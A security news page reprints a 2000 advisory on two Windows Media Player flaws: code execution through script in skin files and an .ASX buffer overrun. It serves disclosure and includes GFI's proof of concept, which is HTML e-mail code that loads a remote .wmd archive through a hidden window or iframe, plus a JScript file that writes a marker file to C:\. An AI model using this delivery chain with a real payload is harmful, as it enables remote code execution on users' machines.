Skip navigation
Menu
Security

Multiple Vulnerabilities in Windows Media Player


 Reported November 23, 2000 by @Stake and GFI

VERSIONS AFFECTED
  • Windows Media Player 7
  • Windows Media Player 6

DESCRIPTION

Two vulnerabilities in Microsoft Windows Media Player have been discovered.  The first vulnerability allows the execution of arbitrary code.  By embedding a javascript (.js) file within a Media Player skin file (.wmz) a malicious user can cause media player to automatically run the code.  Media Player does not prompt users before running code that appears to be Media Player files.

The second vulnerability is a buffer overrun.  The problem lies in how Media Player deals with the .ASX file format.  This vulnerability can allow the execution of arbitrary code.

DEMONSTRATION

The following demonstration for the first vulnerability was provided GFI;

----\[Proof of concept Exploit:

<Embedded within an HTML file or e-mail>

E-mail Example 1.

<head>
<script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) \{ //v2.0
alert('This exploit will now open a new window\n
and automatically download the wmd file\n
and execute it. This will create a file named\n
gfiseclab.txt in your C:\\');
window.open(theURL,winName,features);
\}
//-->
</script>
</head>
<body bgcolor="#FFFFFF"
onLoad="MM_openBrWindow('http://website/test.wmd',','width=0,height=0')">
</Embedded within an HTML e-mail>

E-mail Example 2.

<html>
<body>
<script>
alert('This exploit will now open a new window \n and automatically download
the wmd file \n
and execute it. This will create a file named \n gfiseclab.txt in your
C:\\')</script>
<iframe src="http://website/test.wmd"></iframe></body>
</html>
-------------------------------------

test.wmd is a compressed zip file which contains the following files:

* test.asx: meta file which points to an mpg file and the exploit skin file
* test.mpg: an example mpeg movie.
* test.wmz: the exploit skin file.

test.wmz is also a compressed zip file containing:

* test.js: our javascript which contains the following code

************************************

var fso, f1;
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
function onload()\{
playAgain();
\}

************************************

* test.wms: another metafile which calls test.js

----------------------------------------------------

The second vulnerability proof of concept was provided by @Stake

http://www.atstake.com/research/advisories/2000/asx-bufferoverrun.zip

VENDOR RESPONSE

Microsoft has released a security bulletin, MS00-090 and patches to repair the vulnerability.

Windows Media Player 6.4:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069

Windows Media Player 7:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26067

CREDIT
Discovered by @Stake and GFI
 
Hide comments

More information about text formats

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish
Recommended Reading
DevSecOps concept
90% of Java Services in Production Have Vulnerability Risk, DevSecOps Report Finds
Apr 20, 2024
Businesswoman challenges concept and gender obstacles
Women in Cybersecurity Face Barriers to Hiring, Advancement
Apr 15, 2024
person typing on keyboard with icons for certificates
Top IT Certifications for a Career in Finance
Apr 12, 2024
employee working on a laptop with AI
Why AI Coding Assistants May Be Greatest Cybersecurity Threat Facing Your Business
Mar 26, 2024